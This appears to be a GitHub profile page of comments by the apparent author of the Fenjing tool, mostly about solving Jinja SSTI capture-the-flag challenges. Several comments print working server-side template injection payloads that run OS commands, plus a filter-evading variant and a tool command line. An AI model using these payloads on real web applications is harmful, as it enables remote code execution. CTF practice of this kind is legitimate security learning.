Marven11

Results 11 comments of Marven11

I have the same problem but the CSS above doesn't work. My problem was solved by using: ```css .CodeMirror pre.CodeMirror-line, .CodeMirror-gutter, .CodeMirror-gutters, .CodeMirror-linenumber, .CodeMirror-scroll, .CodeMirror-sizer, .CodeMirror { font-size: 22px !important; line-height:...

I've mailed him several times telling him this is the fix for the CVE since I found it. Maybe he's busy, or maybe he forgot, or ignores everything. We can...

Still waiting for this feature. I want to use Tailscale on my Android phone while visiting websites like YouTube and GitHub in China. To visit those websites, I need to...

It seems you can also set attributes on `lipsum`, so you can temporarily store some objects without needing `config`.

This isn't Jinja SSTI... The RCE point is in `eval(calc_str)`.

> The ezzz_ssti challenge from the ctfshow platform's 单身杯 (Singles' Cup) limits the payload to 40 characters, and the tool can't get past that (#46). I still haven't figured out how to solve it.

That challenge bans parentheses, so RCE isn't possible.

There probably isn't a fully automatic solution for this one. If a similar challenge bans more than just curly braces, you can refer to [this](https://github.com/Marven11/Fenjing/blob/main/examples.md#%E5%9C%A8%E4%B8%8D%E8%8E%B7%E5%8F%96waf%E9%BB%91%E5%90%8D%E5%8D%95%E7%9A%84%E6%83%85%E5%86%B5%E4%B8%8B%E6%A0%B9%E6%8D%AE%E8%BF%94%E5%9B%9E%E9%A1%B5%E9%9D%A2%E4%B8%AD%E7%9A%84%E7%89%B9%E5%BE%81%E7%94%9F%E6%88%90payload) and split the payload into two halves to submit, after which the payload can be searched for fully automatically. But since this challenge only bans curly braces, just split `{{lipsum.__globals__.__builtins__.__import__('os').popen('ls').read()}}` into two halves and submit them; there's no need to bypass the WAF.

This runs:

```jinja
{%set cq=(lipsum|escape|batch(22)|first|last)%}{%set ls=("%c"*4)%(108,115,32,63)%} {% set s= ez|attr(cq~cq~"eq"~cq~cq)|attr(cq~cq~"GLOBALS"|lower~cq~cq)|attr("GET"|lower)("sys")|attr("modules")|attr("GET"|lower)("o""s")|attr("p""open")(ls)|attr("r""ead")() %}
```

For challenges like this that return 200 on an error, you should use `--waf-keyword` to specify the keyword; for this challenge it's `--waf-keyword Hacker`.

```shell
python -m fenjing crack --url 'http://127.0.0.1:5001' --method POST --inputs nickname --waf-keyword 'Hacker'
```

It runs locally for me. Did you copy it wrong?